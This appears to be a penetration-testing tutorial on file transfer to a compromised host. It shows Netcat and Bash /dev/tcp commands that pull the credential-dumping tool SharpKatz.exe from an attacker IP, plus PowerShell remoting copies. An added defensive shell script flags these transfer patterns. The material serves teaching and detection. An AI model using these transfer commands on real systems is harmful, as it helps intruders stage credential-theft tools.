Miscellaneous

Netcat

We'll first start Netcat (nc) on the compromised machine, listening (-l) on port 8000 (-p 8000), and redirect stdout with a single greater-than sign (>) to the file SharpKatz.exe.

Compromised Machine - Listening on Port 8000

victim@target:~$ nc -l -p 8000 > SharpKatz.exe

From our attack host, we'll connect to the compromised machine on port 8000 using Netcat and send the file SharpKatz.exe as input to Netcat. The option -q 0 tells Netcat to close the connection once it finishes. That way, we'll know when the file transfer has completed.

Attack Host - Sending File to Compromised Machine

neutron@kali[/kali]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
neutron@kali[/kali]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Instead of listening on the compromised machine, we can have it connect to a port on our attack host to perform the file transfer. Listen on port 80 on the attack host and send the file SharpKatz.exe as input to Netcat.

Attack Host - Sending File as Input to Netcat

neutron@kali[/kali]$ sudo nc -l -p 80 -q 0 < SharpKatz.exe

Compromised Machine - Connecting to Netcat to Receive the File

victim@target:~$ nc 192.168.49.128 80 > SharpKatz.exe

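If we don't have Netcat on our compromised machine, Bash supports read/write operations on the pseudo-device file /dev/tcp/host/port. Bash interprets these paths itself when they appear in a redirection; they are not real files on disk, so other shells may not support them.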

Attack Host - Sending File as Input to Netcat

neutron@kali[/kali]$ sudo nc -l -p 80 -q 0 < SharpKatz.exe

Compromised Machine - Connecting to Netcat Using /dev/tcp to Receive the File

victim@target:~$ cat < /dev/tcp/192.168.49.128/80 > SharpKatz.exe
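
Seen from the defender's side, each transfer above leaves a recognizable shell command line. The following is an added example, not part of the original page: a POSIX shell classifier that labels such lines. The function names, labels and regular expressions are assumptions of this example, and the sample input is constructed from the commands shown above plus two benign lines.

```shell
#!/bin/sh
# Added example: label logged shell command lines matching this page's
# transfer patterns. Feed it what the shell saw (history, command logging):
# redirections are applied by the shell, so exec telemetry shows only argv.
matches() { printf '%s\n' "$1" | grep -Eq -- "$2"; }

classify_cmdline() {
    cmd=$1 mode=connect dir=
    # Bash-internal /dev/tcp/HOST/PORT redirection (no nc binary involved).
    if matches "$cmd" '[<>][[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'; then
        echo "bash-dev-tcp"; return 0
    fi
    # Only Netcat invocations are in scope; "rsync" must not match "nc".
    if ! matches "$cmd" '(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]'; then
        echo "none"; return 0
    fi
    # Heuristic: a short-option cluster containing "l", or --listen.
    if matches "$cmd" '[[:space:]](-[a-zA-Z]*l[a-zA-Z]*|--listen)([[:space:]]|$)'; then
        mode=listen
    fi
    if matches "$cmd" '<[[:space:]]*[^[:space:]<>]'; then
        dir=-send                      # a file is fed into the socket
    elif matches "$cmd" '>[[:space:]]*[^[:space:]<>]'; then
        dir=-recv                      # socket data is written to a file
    fi
    echo "nc-${mode}${dir}"
}

# Read command lines on stdin; print "label<TAB>command" for every hit.
scan_cmdlines() {
    while IFS= read -r line; do
        label=$(classify_cmdline "$line")
        if [ "$label" != none ]; then printf '%s\t%s\n' "$label" "$line"; fi
    done
}

# Constructed sample input: this page's commands plus two benign lines.
sample_cmdlines() {
    cat <<'EOF'
nc -l -p 8000 > SharpKatz.exe
nc -q 0 192.168.49.128 8000 < SharpKatz.exe
sudo nc -l -p 80 -q 0 < SharpKatz.exe
nc 192.168.49.128 80 > SharpKatz.exe
cat < /dev/tcp/192.168.49.128/80 > SharpKatz.exe
ls -l /var/log > listing.txt
rsync -a /srv/data backup:/srv/
EOF
}
sample_cmdlines | scan_cmdlines
```

The /dev/tcp case never spawns a Netcat process, so it can only be caught from the shell's own command line or from network telemetry, not from a process-name rule.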

PowerShell Session File Transfer

Create a PowerShell Remoting Session to DATABASE01

PS C:\xyz> $Session = New-PSSession -ComputerName DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session

PS C:\xyz> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

Copy DATABASE.txt from DATABASE01 Session to our Localhost

PS C:\xyz> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session